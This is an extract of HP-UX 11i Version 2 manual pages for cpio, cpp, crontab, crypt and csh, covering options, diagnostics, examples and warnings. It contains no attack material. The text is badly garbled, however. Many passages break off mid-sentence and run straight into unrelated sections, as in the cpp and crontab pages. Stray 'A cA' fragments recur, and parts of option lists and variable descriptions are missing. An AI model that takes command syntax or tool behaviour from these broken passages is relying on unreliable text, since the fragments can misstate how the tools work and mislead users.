LC_TIME determines the format and content of date and time strings output when listing the contents of
an archive with the v option.
LANG determines the language in which messages are displayed.
If LC_COLLATE, LC_CTYPE, or inter-
nationalization variable contains an invalid setting, cpio behaves as if all internationalization variables
are set to "C". See environ (5).
RETURN VALUE
cpio returns the following exit codes:
0 Successful completion. Review standard error for files that could not be transferred.
1 Error during resynchronization. Some files may not have been recovered.
2 Out-of-phase error. A file header is corrupt or in the wrong format.
DIAGNOSTICS
Out of phase--get help
Perhaps the "c" option should[n’t] be used
cpio -i could not read the header of an archived file. The header is corrupt or it was written in a
different format. Without the R option, cpio returns an exit code of 2.
If no file name has been displayed yet, the problem may be the format. Try specifying a different
header format option: null for standard format; c for ASCII; b, s, P, or S, for one of the byte-
swapping formats; or 6 for UNIX Sixth Edition.
Otherwise, a header may be corrupt. Use the R option to have cpio attempt to resynchronize the
file automatically. Resynchronizing means that cpio tries to find the next good header in the
archive file and continues processing from there. If cpio tries to resynchronize from being out of
phase, it returns an exit code of 1.
Other diagnostic messages are self-explanatory.
EXAMPLES
Copy the contents of a directory into a tape archive:
ls | cpio -o > /dev/rmt/c0t0d0BEST
Duplicate a directory hierarchy:
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−121
cpio(1) cpio(1)
cd olddir
find . -depth -print | cpio -pd newdir
The trivial case
find . -depth -print | cpio -oB >/dev/rmt/c0t0d0BEST
can be handled more efficiently by:
find . -cpio /dev/rmt/c0t0d0BEST
WARNINGS
Because of industry standards and interoperability goals, cpio does not support the archival of files
larger than 2 GB or files that have user/group IDs greater than 60 K. Files with user/group IDs greater
than 60 K are archived and restored under the user/group ID of the current process.
A cA Do not redirect the output of cpio to a named cpio archive file residing in the same directory as the ori-
ginal files belonging to that cpio archive. This can cause loss of data.
cpio strips any leading ./ characters in the list of file names piped to it.
Path names are restricted to PATH_MAX characters (see <limits.h> and limits (5)). If there are too
many unique linked files, the program runs out of memory to keep track of them. Thereafter, linking
information is lost. Only users with appropriate privileges can copy special files.
cpio tapes written on HP machines with the -ox[c] options can sometimes mislead (non-HP) versions of
cpio that do not support the x option. If a non-HP (or non-AT&T) version of cpio happens to be
modified so that the (HP) cpio recognizes it as a device special file, a spurious device file might be
created.
If /dev/tty is not accessible, cpio issues a complaint and exits.
The -pd option does not create the directory typed on the command line.
The -idr option does not make empty directories.
The -plu option does not link files to existing files.
POSIX defines a file named TRAILER!!! as an end-of-archive marker. Consequently, if a file of that
name is contained in a group of files being written by cpio -o, the file is interpreted as end-of-archive,
and no remaining files are copied. The recommended practice is to avoid naming files anything that
resembles an end-of-archive file name.
To create a POSIX-conforming cpio archive, the c option must be used. To read a POSIX-conforming
cpio archive, the c option must be used and the b, s, S, and 6 options should not be used. If the user
does not have appropriate privileges, the U option must also be used to get POSIX-conforming behavior
when reading an archive. Users with appropriate privileges should not use this option to get POSIX-
conforming behavior.
DEPENDENCIES
If the path given to cpio contains a symbolic link as the last element, this link is traversed and path
name resolution continues. cpio uses the symbolic link’s target, rather than that of the link.
SEE ALSO
ar(1), find(1), tar(1), cpio(4), acl(5), environ(5), lang(5), regexp(5).
STANDARDS CONFORMANCE
cpio: SVID2, SVID3, XPG2, XPG3
Section 1−−122 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
cpp(1) cpp(1)
NAME pre-
ferred way to invoke cpp is through the cc command, since the functionality of cpp may someday be
moved elsewhere. See m4(1) for a general macro processor. A cA 188 bytes. This option serves to eliminate ‘‘Macro param too large’’,
‘‘Macro invocation too large’’, ‘‘Macro param too large after substitution’’, ‘‘Quoted macro
param too large’’, ‘‘Macro buffer too small’’, ‘‘Input line too long’’, and ‘‘Cat direc-
tory argu-
ment.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−123
cpp(1) cpp(1)
A cA−#endif pairs. This
makes it easier, when reading the source, to match #if, #ifdef, and #ifndef direc-
tives with their associated #endif directive.
#elif constant-expression
Equivalent to:
#else
#if constant-expression
#else Reverses the notion of the test directive that matches this directive. Thus, if lines previ-
ous.
Section 1−−124 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
cpp(1) cpp(1)
#ifdef name The lines following appear in the output if and only if name has been the subject of a pre-
vious .
A cA
#undef name Cause the definition of name (if any) to be forgotten from now on.
The test directives and the possible #else directives can be nested. cpp supports names up to 255 char-
acters in length.
Notes
The macro substitution scheme has been changed. Previous versions of cpp saved macros in a macro
definition table whose table size is 128 000 bytes by default. The current version of cpp replaces this
macro definition table with several small buffers. The default size of the small buffers is 8 188 bytes.
EXTERNAL INFLUENCES
Environment Variables
LC_CTYPE determines the interpretation of comments and string literals as single- or multibyte charac-
ters.,
it defaults to "C" (see lang (5)). If any internationalization variable contains an invalid setting, cpp
behaves as if all internationalization variables are set to "C". See environ (5).
Workstation.)
HP-UX 11i Version 2: August 2003 −3− Hewlett-Packard Company Section 1−−125
cpp(1) cpp(1)
FILES
/usr/include Standard directory for #include files
SEE ALSO
m4(1).
STANDARDS CONFORMANCE
cpp: SVID2, SVID3, XPG2
A cA
Section 1−−126 Hewlett-Packard Company −4− HP-UX 11i Version 2: August 2003
cront:
A cA
crontab [file] Create or replace your crontab file by copying the specified file , or stan-
dard input if file is omitted or - is specified as file , into the crontab direc-
tory, on-
tab:
minute The minute of the hour, 0−59
hour The hour of the day, 0−23
monthday The day of the month, 1−31
month The month of the year, 1−12
weekday The day of the week, 0−6, exe-
cuted.
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−127
crontab(1) crontab(1)
Blank lines and those whose first non-blank character is # will be ignored.
cron invokes the command from the user’s HOME directory with the POSIX shell, (/usr/bin/sh). It
runs in the c queue (see queuedefs (4))..
A cA, crontab behaves as if all international-
ization variables are set to "C". See environ (5). EDITOR determines the editor to be invoked when -e
option is specified. The default editor is vi.
WARNINGS
Be sure to redirect the standard output and standard error from commands. If this is not done, any gen-
erated
Section 1−−128 Hewlett-Packard Company −2− HP-UX 11i Version 2: August 2003
crypt(1) crypt(1)
NAME
crypt - encode/decode files
SYNOPSIS
crypt [ password ]
DESCRIPTION. A cA
Files encrypted by crypt are compatible with those treated by the ed editor in encryption mode (see
ed(1)).
Security of encrypted files depends on three factors: the fundamental method must be hard to solve;
direct search of the key space must be infeasible; ‘‘sneak paths’’ by which keys or clear text can become
visible must be minimized.
crypt implements a one-rotor machine designed along the lines of the German Enigma, but with a 256-
element rotor. Methods of attack on such machines are widely known; thus crypt provides minimal secu-
rity.
The transformation of a key into the internal settings of the machine is deliberately designed to be expen-
sive; i.e., to take a substantial fraction of a second to compute. However, if keys are restricted to, for
example, three lowercase letters, then encrypted files can be read by expending only a substantial frac-
tion of five minutes of machine time.
Since the key is an argument to the crypt command, it is potentially visible to users executing the ps
or a derivative (see ps (1)). The choice of keys and key security are the most vulnerable aspect of crypt.
EXAMPLES
The following example demonstrates the use of crypt to edit a file that the user wants to keep strictly
confidential:
$ crypt <plans >plans.x
key: violet
$ rm plans
...
$ vi -x plans.x
key: violet
...
:wq
$
...
$ crypt <plans.x | pr
key: violet
Note that the -x option is the encryption mode of vi, and prompts the user for the same key with which
the file was encrypted.
WARNINGS
/dev/tty for typed key
SEE ALSO
ed(1), makekey(1), stty(1).
HP-UX 11i Version 2: August 2003 −1− Hewlett-Packard Company Section 1−−129
csh(1) csh(1)
NAME
csh - a shell (command interpreter) with C-like syntax
SYNOPSIS
csh [-cefinstvxTVX] [ command_file ] [ argument_list ... ]
DESCRIPTION
csh is a command language interpreter that incorporates a command history buffer, C-like syntax, and
job control facilities.
Command Options
Command options are interpreted as follows:
A cA -c Read commands from the (single) following argument which must be present. Any
remaining arguments are placed in argv.
-e C shell exits if any invoked command terminates abnormally or yields a non-zero exit
status.
-f Suppress execution of the .cshrc file in your home directory, thus speeding up shell
start-up time.
-i Force csh to respond interactively when called from a device other than a computer ter-
minal (such as another computer). csh normally responds non-interactively. If csh is
called from a computer terminal, it always responds interactively, regardless of which
options are selected.
-n Parse but do not execute commands. This is useful for checking syntax in shell scripts.
All substitutions are performed (history, command, alias, etc.).
-s Take command input from the standard input.
-t Read and execute a single line of input.
-v Set the verbose shell variable, causing command input to be echoed to the standard
output device after history substitutions are made.
-x Set the echo shell variable, causing all commands to be echoed to the standard error
immediately before execution.
-T Disable the tenex features which use the ESC key for command/file name completion and
CTRL-D for listing available files (see the CSH UTILITIES section below)
-V Set the verbose variable before .cshrc is executed so that all .cshrc commands
are also echoed to the standard output.
-X Set the echo variable before .cshrc is executed so that all .cshrc commands are
also echoed to the standard output.
After processing the command options, if arguments remain in the argument list, and the -c, -i, -s, or
-t options were not specified, the first remaining argument is taken as the name of a file of commands to
be executed.
COMMANDS
A simple command is a sequence of words, the first of which specifies the command to be executed. A
sequence of simple commands separated by vertical bar (|) characters forms a pipeline. The output of
each command in a pipeline becomes the input for the next command in the pipeline. Sequences of pipe-
lines can be separated by semicolons (;) which causes them to be executed sequentially. A sequence of
pipelines can be executed in background mode by adding an ampersand character (&) after the last entry.
Any pipeline can be placed in parentheses to form a simple command which, in turn, can be a component
of another pipeline. Pipelines can also be separated by | | or && indicating, as in the C language, that
the second pipeline is to be executed only if the first fails or succeeds, respectively.
Jobs
csh associates a job with each pipeline and keeps a table of current jobs (printed by the jobs com-
mand) and assigns them small integer numbers. When a job is started asynchronously using &, the shell
prints a line resembling:
Section 1−−130 Hewlett-Packard Company −1− HP-UX 11i Version 2: August 2003
csh(1) csh(1)
[1] 1234
indicating that the job which was started asynchronously was job number 1 and had one (top-level) pro-
cess, whose process id was 1234.
If you are running a job and want to do something else, you can type the currently defined suspend char-
acter (see termio (7)) which sends a stop signal to the current job. csh then normally indicates that the
job has been ‘Stopped’, and prints another prompt. You can then manipulate the state of this job, putting
it in the background with the bg command, run some other commands, and then eventually bring the job
back into the foreground with the foreground command fg. A suspend takes effect immediately and is
like an interrupt in that pending output and unread input are discarded when it is typed. There is a
delayed suspend character which does not generate a stop signal until a program attempts to read (2) it.
This can usefully be typed ahead when you have prepared some commands for a job which you want to
stop after it has read them.
A job being run in the background stops if it tries to read from the terminal. Background jobs are nor-
A cA
mally allowed to produce output, but this can be disabled by giving the command stty tostop (see
stty (1)). If you set this tty option, background jobs stop when they try to produce output, just as they do
when they try to read input. Keyboard signals and line-hangup signals from the terminal interface are
not sent to background jobs on such systems. This means that background jobs are immune to the effects
of logging out or typing the interrupt, quit, suspend, and delayed suspend characters (see termio (7))., typing %1 & resumes job 1
in the background. Jobs can also be named by prefixes of the string typed in to start them if these
prefixes are unambiguous; thus %ex normally restarts a suspended ex(1) job, if there is only one
suspended job whose name begins with the string ex. It is also possible to say %?string which
specifies a job whose text contains string , if there is only one such job.
csh maintains a notion of the current and previous jobs. In output pertaining to jobs, the current job is
marked with a + and the previous job with a -. The abbreviation %+ refers to the current job and %-
refers to the previous job. For close analogy with the syntax of the history mechanism (described below),
%% is also a synonym for the current job.
csh learns immediately whenever a process changes state. It normally informs you whenever a job
becomes blocked so that no further progress is possible, but only just before printing a prompt. This is
done so that it does not otherwise disturb your work. If, however, you set the shell variable notify,
csh notifies you immediately of changes in status of background jobs. There is also a csh built-in com-
mand called notify which marks a single process so that any status change is immediately reported.
By default, notify marks the current process. Simply type notify after starting a background job to
mark it.
If you try to leave the shell while jobs are stopped, csh sends the warning message: You have
stopped jobs. Use the jobs command to see what they are. If you do this or immediately try to exit
again, csh does not warn you a second time, and the suspended jobs are terminated (see exit (2)).
Built-In Commands
Built-in commands are executed within the shell without spawning a new process. If a built-in command
occurs as any component of a pipeline except the last, it is executed in a subshell. The built-in commands
are:
alias
alias name
alias name wordlist
The first form prints all aliases. The second form prints the alias for name. The third form
assigns the specified wordlist as the alias of name. Command and file name substitution
are performed on wordlist . name cannot be alias or unalias.
bg [ %job ... ]
Put the current (job not specified).
HP-UX 11i Version 2: August 2003 −2− Hewlett-Packard Company Section 1−−131
csh(1) csh(1)
breaksw
Causes a break from a switch, resuming after the endsw.
case label :
A label in a switch statement as discussed below.
cd
cd directory_name
chdir
chdir directory_name
Change the shell’s current working directory to directory_name. If not specified,
directory_name defaults to your home directory.
If directory_name is not found as a subdirectory of the current working directory (and does
not begin with /, ./, or ../), each component of the variable cdpath is checked to see if it
A cA has a subdirectory directory_name. Finally, if all else fails, csh treats directory_name as
a shell variable. If its value begins with /, this is tried to see if it is a directory. See also
cd(1).
continue
Continue execution of the nearest enclosing while or foreach. The rest of the com-
mands on the current line are executed.
default:
Labels the default case in a switch statement. The default should come after all other
case labels.
dirs Prints the directory stack; the top of the stack is at the left; the first directory in the stack
is the current directory.
echo wordlist
echo -n wordlist
The specified words are written to the shell’s standard output, separated by spaces, and ter-
minated with a new-line unless the -n option is specified. See also echo (1).
else
end
endif
endsw See the descriptions of the foreach, if, switch, and while statements below.
eval arguments ...
(Same behavior as sh(1).) arguments are read as input to the shell and the resulting
command(s) executed. This is usually used to execute commands generated as the result of
command or variable substitution, since parsing occurs before these substitutions.
exec command
The specified command is executed in place of the current shell.
exit
exit (expression )
csh exits either with the value of the status variable (first form) or with the value of the
specified expression (second form).
fg [ %job ... ]
Brings the current (job not specified) or specified jobs into the foreground, continuing them
if they were stopped.
foreach name (wordlist )
...
end The variable name is successively set to each member of wordlist and the sequence of com-
mands between this command and the matching end are executed. (Both foreach and
end must appear alone on separate lines.)
The built-in command continue can be used to continue the loop prematurely; the built-
in command break to terminate it prematurely. When this command is read from the
terminal, the loop is read once, prompting with ? before any statements in the loop are
executed. If you make a mistake while typing in a loop at the terminal, use the erase or
line-kill character as appropriate to recover.
Section 1−−132 Hewlett-Packard Company −3− HP-UX 11i Version 2: August 2003
csh(1) csh(1)
glob wordlist
Like echo but no \ escapes are recognized and words are delimited by null characters in
the output. Useful in programs that use the shell to perform file name expansion on indicating how effective the internal hash table has been at locating
commands (and avoiding execs). An exec is attempted for each component of the path
where the hash function indicates a possible hit, and in each component that does not begin
with a /. A cA
history [-h] [-r] [ n ]
Displays the history event list. If n is given, only the n most recent events are printed. The
-r option reverses the order of printout to be most recent first rather than oldest first. The
-h option prints the history list without leading numbers for producing files suitable for the
source command.
if (expression ) command
If expression evaluates true, the single command with arguments is executed. Variable
substitution on command happens early, at the same time it does for the rest of the if
command. command must be a simple command; not a pipeline, a command list, a
parenthesized command list, or an aliased command. Input/output redirection occurs even
if expression is false, meaning that command is not executed (this is a bug).
if (expression1 ) then
...
else if (expression2 ) then
...
else
...
endif If expression1 is true, all commands down to the first else are executed; otherwise if
expression2 is true, all commands from the first else down to the second else are exe-
cuted, etc. Any number of else-if pairs are possible, but only one endif is needed.
The else part is likewise optional. (The words else and endif must appear at the
beginning of input lines. The if must appear alone on its input line or after an else.)
jobs [-l]
Lists active jobs. The -l option lists process IDs in addition to the usual information.
kill % job
kill - sig % job ...
kill pid
kill - sig pid ...
kill -l
Sends either the TERM (terminate) signal or the specified signal to the specified jobs or
processes. Signals are either given by number or by names (as given in
/usr/include/signal.h, stripped of the SIG prefix (see signal (2)). The signal
names are listed by kill -l. There is no default, so kill used alone does not send a
signal to the current job. If the signal being sent is TERM (terminate) or HUP (hangup),
the job or process is sent a CONT (continue) signal as well. See also kill (1).
limit[-h][ resource ][ maximum_use ]
Limits the usage by the current process and each process it creates not to (individually)
exceed maximum_use on the specified resource . If maximum_use is not specified, then the
current limit is displayed; if resource is not specified, then all limitations are given.
If the -h flag is specified,:
HP-UX 11i Version 2: August 2003 −4− Hewlett-Packard Company Section 1−−133
csh(1) csh(1)
Section 1−−134 Hewlett-Packard Company −5− HP-UX 11i Version 2: August 2003
csh(1) csh(1)
the n th entry in the stack. The elements of the directory stack are numbered from 0 start-
ing at the top. A synonym for popd, called rd, is provided for historical reasons. Its use is
not recommended because it is not part of the standard BSD csh and may not be sup-
ported in future releases.
pushd [ name ] [ +n ]
With no arguments, pushd exchanges the top two elements of the directory stack. Given a
name argument, pushd changes to the new directory (using cd) and pushes the old current
working directory (as in csw) onto the directory stack. With a numeric argument, pushd
rotates the n th argument of the directory stack around to be the top element and changes
to that directory. The members of the directory stack are numbered from the top starting
at 0. A synonym for pushd , called gd, is provided for historical reasons. Its use is not
recommended since it is not part of the standard BSD csh and may not be supported in
future releases.
A cA one of the system direc-
tories. set shows the value of all shell variables. Variables whose value is other
than a single word . In all cases the value is command and file-name expanded.
These arguments can be repeated to set multiple values in a single set command. Note,
however, that variable expansion happens for all arguments before any setting occurs.
setenv name value
Sets the value of environment variable name to be value , a single string. The most com-
monly used environment variables, USER, TERM, and PATH, are automatically imported to
and exported from the csh variables user , term , and path ; there is no need to use
setenv for these.
shift [ variable ]
If no argument is given, the members of argv are shifted to the left, discarding argv[1].
An error occurs if argv is not set or has less than two strings assigned to it. When vari-
able is specified, shift performs the same function on the specified variable .
source [-h] name
csh reads commands from name. source commands can be nested, but if nested too
deeply the shell may run out of file descriptors or reach the max stack size (see maxssiz (5)).
An error in a source at any level terminates all nested source commands. Normally,
input during source commands is not placed on the history list. The -h option can be
used to place commands in the history list without being executing them.
stop [ %job ... ]
Stops the current (no argument) or specified jobs executing in the background.
suspend
Causes csh to stop as if it had been sent a suspend signal. Since csh normally ignores
suspend signals, this is the only way to suspend the shell. This command gives an error
message if attempted from a login shell.
HP-UX 11i Version 2: August 2003 −6− Hewlett-Packard Company Section 1−−135
csh(1) csh(1)
switch (string )
case str1 :
...
breaksw
...
default:
...
breaksw
endsw Each case label (str1 ) is successively matched against the specified string which is first
command and file name expanded. The form of the case labels is the Pattern Matching
Notation with the exception that non-matching lists in bracket expressions are not sup-
ported (see regexp (5)). If none of the labels match before a default label is found, the
execution begins after the default label. Each case label and the default label
A cA must appear at the beginning of a line. The breaksw command causes execution to con-
tinue after the endsw. Otherwise, control may fall through case labels and default
labels as in C. If no label matches and there is no default, execution continues after the
endsw.
time [ command ]
When command is not specified, a summary of time used by this shell and its children is
printed. If specified, the simple command is timed and a time summary as described under
the time variable is printed. If necessary, an extra shell is created to print the time
statistic when the command completes.
umask [ value ]
The current file creation mask is displayed (value not specified) or set to the specified
value . The mask is given in octal. Common values for the mask are 002, which gives all
permissions to the owner and group and read and execute permissions to all others, or 022,
which gives all permissions to the owner, and only read and execute permission to the
group and all others. See also umask(1).
unalias pattern
All aliases whose names match the specified pattern are discarded. Thus, all aliases are
removed by unalias *. No error occurs if pattern does not match an existing alias.
unhash
Use of the internal hash table to speed location of executed programs is disabled.
unset pattern
All variables whose names match the specified pattern are removed. Thus, all variables are
removed by unset *; this has noticeably undesirable side-effects. No error occurs if pat-
tern matches nothing.
unsetenv pattern
Removes all variables whose names match the specified pattern from the environment. See
also the setenv command above and printenv (1).
wait Waits for all background jobs to terminate. If the shell is interactive, an interrupt can dis-
rupt the wait, at which time the shell prints names and job numbers of all jobs known to be
outstanding.
while (expression )
...
end While the specified expression evaluates non-zero, the commands between the while and
the matching end are evaluated. break and continue can be used to terminate or
continue the loop prematurely. (The while and end must appear alone on their input
lines.) If the input is a terminal (i.e., not a script), prompting occurs the first time through
the loop as for the foreach statement.
%job Brings the specified job into the foreground.
%job & Continues the specified job in the background.
@
@ name =expression
@ name [index ]=expression
The first form prints the values of all the shell variables. The second form sets the specified
name to the value of expression . If the expression contains <, >, &, or |, at least this part
Section 1−−136 Hewlett-Packard Company −7− HP-UX 11i Version 2: August 2003
csh(1) csh(1)
of the expression must be placed within parentheses. The third form assigns the value of
expression to the index th argument of name. Both name and its index th component must
already exist.
The operators *=, +=, etc., are available as in C. White space can optionally separate the
name from the assignment operator. However, spaces are mandatory in separating com-
ponents of expression which would otherwise be single words.
Special postfix ++ and - - operators increment and decrement name, respectively (e.g.,
@ i++).
History Substitutions
History substitutions enable you to repeat commands, use words from previous commands as portions of
new commands, repeat arguments of a previous command in the current command, and fix spelling or
typing mistakes in an earlier command.
History substitutions begin with an exclamation point (!). Substitutions can begin anywhere in the input
stream, but cannot be nested. The exclamation point can be preceded by a backslash to cancel its special
meaning. For convenience, an exclamation point is passed to the parser unchanged when it is followed by
a blank, tab, newline, equal sign, or left parenthesis. Any input line that contains history substitution is
echoed on the terminal before it is executed for verification.
Commands input from the terminal that consist of one or more words are saved on the history list. The
history substitutions reintroduce sequences of words from these saved commands into the input stream.
The number of previous commands saved is controlled by the history variable. The previous com-
mand is always saved, regardless of its value. Commands are numbered sequentially from 1.
HP-UX 11i Version 2: August 2003 −8− Hewlett-Packard Company Section 1−−137
csh(1) csh(1)
You can refer to previous events by event number (such as !10 for event 10), relative event location
(such as !-2 for the second previous event), full or partial command name (such as !d for the last event
using a command with initial character d), and string expression (such as !?mic? referring to an event
containing the characters mic).
These forms, without further modification, simply reintroduce the words of the specified events, each
separated by a single blank. As a special case, !! is a re-do; it refers to the previous command.
To select words from a command, use a colon (:) and a designator for the desired words after the event
specification. The words of an input line are numbered from zero. The basic word designators are:
0 First word (i.e., the command name itself).
n nth word.
Section 1−−138 Hewlett-Packard Company −9− HP-UX 11i Version 2: August 2003
csh(1) csh(1)
text of the previous line. Thus ˆlbˆlib fixes.
Alias Substitution
csh, significant to the
parser: -, &, |, <, >, (, and ).
Also available in expressions as primitive operands are command executions enclosed in curly braces
( { } ) and file enquiries of the form -l filename, where l is one of:
r read access
w write access
x execute access
e existence
o ownership
z zero size
f plain file
d directory
The specified filename is command- and file-name expanded then tested to see if it has the specified rela-
tionship to the real user. If the file does not exist or is inaccessible, all inquiries return false (0). Com-
A cA flow of control in command files
.
CSH VARIABLES
csh maintains a set of variables. Each variable has a value equal to zero or more strings (words). Vari-
ables have names consisting of up to 80 letters and digits starting with a letter. The underscore character
is considered a letter. The value of a variable may be displayed and changed by using the set and
unset commands. Some of the variables are Boolean, that is, the shell does not care what their value is,
only whether they are set or not.
Some operations treat variables numerically. The at sign (@) command permits numeric calculations to
be performed and the result assigned to a variable. The null string is considered to be zero, and any sub-
sequent words of multi-word values are ignored.
After the input line is aliased and parsed, and before each command is executed, variable expansion is
performed keyed by the dollar sign ($) character. Variable expansion can be prevented by preceding the
dollar sign with a backslash character (\) except within double quotes (") where substitution always
occurs. Variables are never expanded if enclosed in single quotes. Strings quoted by single quotes are A cA
interpreted later (see Command Substitution ) so variable substitution does not occur there until later, if
at all. A dollar sign is passed unchanged if followed by a blank, tab, or end-of-line.
Input/output redirections are recognized before variable expansion, and are variable expanded
separately. Otherwise, the command name and entire argument list are expanded together.
Unless enclosed in double quotes or given the :q modifier, the results of variable substitution may even-
tually be command and file name substituted. Within double quotes, a variable whose value consists of
multiple words expands to a portion of a single word, with the words of the variable’s shell input. Except as
noted, it is an error to reference a variable that is not set.
$variable_name
${variable_name }
When interpreted, this sequence is replaced by the words of the value of the variable
variable_name , each separated by a blank. Braces insulate variable_name from subse-
quent characters that would otherwise be interpreted to be part of the variable name itself.
If variable_name is not a csh variable, but is set in the environment, that value is used.
Non- csh variables cannot be modified as shown below.
$variable_name[selector]
${variable_name[selector] }
This modification selects only some of the words from the value of variable_name. The
selector is subjected to variable substitution, and can consist of a single number or two
numbers separated by a dash. The first word of a variable’s value is numbered 1. If the
first number of a range is omitted it defaults to 1. If the last member of a range is omitted
it defaults to the total number of words in the variable ($#variable_name). An asterisk
metacharacter used as a selector selects all words.
$#variable_name
${#variable_name }
This form gives the number of words in the variable, and is useful for forms using a [selec-
tor ] option.
$0 This form substitutes the name of the file from which command input is being read. An
error occurs if the file name is not known.
$number
${number }
This form is equivalent to an indexed selection from the variable argv ($argv[number]).
$* This is equivalent to selecting all of argv ($argv[*]).
The modifiers :h, :t, :r, :q, and :x can be applied to the substitutions above, as can :gh, :gt, and
:gr. If curly braces ({ }) appear in the command form, the modifiers must appear within the braces.
The current implementation allows only one : modifier on each $d expansion .
The following substitutions cannot be modified with : modifiers:
$?variable_name
${?variable_name }
Substitutes the string 1 if variable_name is set, 0 if it is not.
$?0 Substitutes 1 if the current input file name is known, 0 if it is not.
$$ Substitutes the (decimal) process number of the (parent) shell.
$< Substitutes a line from the standard input, with no further interpretation thereafter. It can
be used to read from the keyboard in a shell script.
noglob If set, file name expansion is inhibited. This is most useful in shell scripts that are
not dealing with file names, or after a list of file names has been obtained and
further expansions are not desirable.
nonomatch If set, it is no longer an error for a file name expansion to not match any existing
files. If there is no match, the primitive pattern is returned. It is still an error for
the primitive pattern to be malformed. For example, ’echo [’ still gives an
error.
notify If set, csh notifies you immediately (through your standard output device) of back-
ground job completions. The default is unset (indicate job completions just before
printing a prompt).
path Each word of the path variable specifies a directory in which commands are to be
sought for execution. A null word specifies your current working directory. If there
is no path variable, only full path names can be executed. When path is not set and
A cA
when users do not specify full path names, csh searches for the command through
the directories . (current directory) and /usr/bin. A csh which is given nei-
ther the -c nor the -t option normally hashes the contents of the directories in
the path variable after reading .cshrc, and each time the path variable is
reset. If new commands are added to these directories while the shell is active, it is
necessary to execute rehash for csh to access these new commands.
prompt This variable lets you select your own prompt character string. The prompt is
printed before each command is read from an interactive terminal input. If a !
appears in the string, it is replaced by the current command history buffer event
number unless a preceding \ is given. The default prompt is the percent sign (%)
for users and the # character for the super-user.
savehist The number of lines from the history list that are saved in ˜/.history when the
user logs out. Large values for savehist slow down the csh during startup.
shell This variable contains the name of the file in which the csh program resides. This
variable is used in forking shells to interpret files that have their execute bits set
but which are not executable by the system. (See the description of Non-Built-In
Command Execution ).
status This variable contains the status value returned by the last command. If the com-
mand terminated abnormally, 0200 is added to the status variable’s value. Built-in
commands which terminated abnormally return exit status 1, and all other built-in
commands set status to 0.
time This variable contains a numeric value that controls the automatic timing of com-
mands. If set, csh prints, for any command taking more than the specified
number of cpu seconds, a line of information to the standard output device giving
user, system, and real execution times plus a utilization percentage. The utilization
percentage is the ratio of user plus system times to real time. This message is
printed after the command finishes execution.
verbose This variable is set by the -v command line option. If set, the words of each com-
mand are printed on the standard output device after history substitutions have
been made.
Command Substitution
Command substitution is indicated by a command enclosed in grave accents (‘... ‘). The output from
such a command is normally broken into separate words at blanks, tabs and newlines, with null words
being discarded; this text then replacing the original string. Within double quotes, only newlines force
new words; blanks and tabs are preserved.
In any case, the single final newline does not force a new word. Note that it is thus possible for a com-
mand substitution to yield only part of a word, even if the command outputs a complete line.
Input/Output
The standard input and standard output of a command can be redirected with the following syntax:
< name Open file name (which is first variable, command and file name expanded) as the
standard input.
<< word Read the shell input up to a line which is identical to word. word is not subjected to
variable, file name or command substitution, and each input line is compared to
word before any substitutions are done on this input line. Unless a quoting \, ’, or
‘ appears in word, variable and command substitution is performed on the inter-
vening lines, allowing \ to quote $, \ and ‘., it is created; if
the file exists, it is truncated, and its previous contents are lost.
If the variable noclobber is set, the file must not exist or be a character special
file (e.g., a terminal or /dev/null) or an error results. This helps prevent
accidental destruction of files. In this case the exclamation point (!) forms can be
used to suppress this check.
The forms involving the ampersand character (&) route the standard error into the
specified file as well as the standard output. name is expanded in the same way as
< input file names are.
>> name
>>& name
>>! name
>>&! name Uses file name as standard output the same as >, but appends output to the end of
the file. If the variable noclobber is set, it is an error for the file not to exist
unless one of the ! forms is given. Otherwise, it is similar to >.
A command receives the environment in which the shell was invoked as modified by the input-output
parameters and the presence of the command in a pipeline. Thus, unlike some previous shells, com-
mands executed from a shell script have no access to the text of the commands by default; rather they
receive the original standard input of the shell. The << mechanism should be used to present inline
data. This permits shell scripts to function as components of pipelines and allows the shell to block-read
its input.
Diagnostic output can be directed through a pipe with the standard output. Simply use the form |&
rather than | by itself.
CSH UTILITIES
File Name Completion
In typing file names as arguments to commands, it is no longer necessary to type a complete name, only a
unique abbreviation is necessary. When you want the system to try to match your abbreviation, press the
ESC key. The system then completes the file name for you, echoing the full name on your terminal. If
A cA
the abbreviation does not match an available file name, the terminal’s bell is sounded. The file name may
be partially completed if the prefix matches several longer file names. In this case, the name is extended
up to the ambiguous deviation, and the bell is sounded.
File name completion works equally well when other directories are addressed. In addition, the tilde (˜)
convention for home directories is understood in this context.
Autologout
A new shell variable has been added called autologout. If the terminal remains idle (no character
input) at the shell’s top level for a number of minutes greater than the value assigned to autologout,
you are automatically logged off. The autologout feature is temporarily disabled while a command is
executing. The initial value of autologout is 600. If unset or set to 0, autologout is entirely dis-
abled.
Sanity
C shell restores your terminal to a sane mode if it appears to return from some command in raw, cbreak,
or noecho mode.
EXTERNAL INFLUENCES
Environment Variables
LC_COLLATE determines the collating sequence used in evaluating pattern matching notation for file
name substitution.
LC_CTYPE determines the interpretation of text as single and/or multi-byte characters, the classification
of characters as letters, and the characters matched by character class expressions in pattern matching
notation.
LANG determines the language in which messages are displayed. vari-
able contains an invalid setting, csh behaves as if all internationalization variables are set to "C". See
environ (5).
WARNINGS
The .cshrc file should be structured such that it cannot generate any output on standard output or
standard error, including occasions when it is invoked without an affiliated terminal. rcp (1) causes
.cshrc to be sourced, and any output generated by this file, even to standard error causes problems.
Commands such as stty (1) should be placed in .login, not in .cshrc, so that their output cannot affect
rcp (1).
csh has certain limitations. Words or environment variables can be no longer than 10240 characters.
The system limits argument lists to 10240 characters. The number of arguments to a command which.
When a command is restarted from a stop, csh prints the directory it started in if it is different from the
current directory; this can be misleading (i.e., wrong) because the job may have changed directories inter-
nally.
Shell built-in functions are not stoppable/restartable. Command sequences of the form a ; b ; c are
also not handled gracefully when stopping is attempted. If you interrupt b, the shell then immediately
executes c. This is especially noticeable if this expansion results from an alias. It suffices to place the
sequence of commands in parentheses to force it into a subshell; i.e., ( a ; b ; c ).
Because of the signal handling required by csh, interrupts are disabled just before a command is exe-
cuted, and restored as the command begins execution. There may be a few seconds delay between when a
command is given and when interrupts are recognized., prompted for by ?, are not placed in the history list. Control structure should be
parsed rather than being recognized as built-in commands. This would allow control commands to be
placed anywhere, to be combined with |, and to be used with & and ; metasyntax.
It should be possible to use the : modifiers on the output of command substitutions. All and more than
one : modifier should be allowed on $ substitutions.
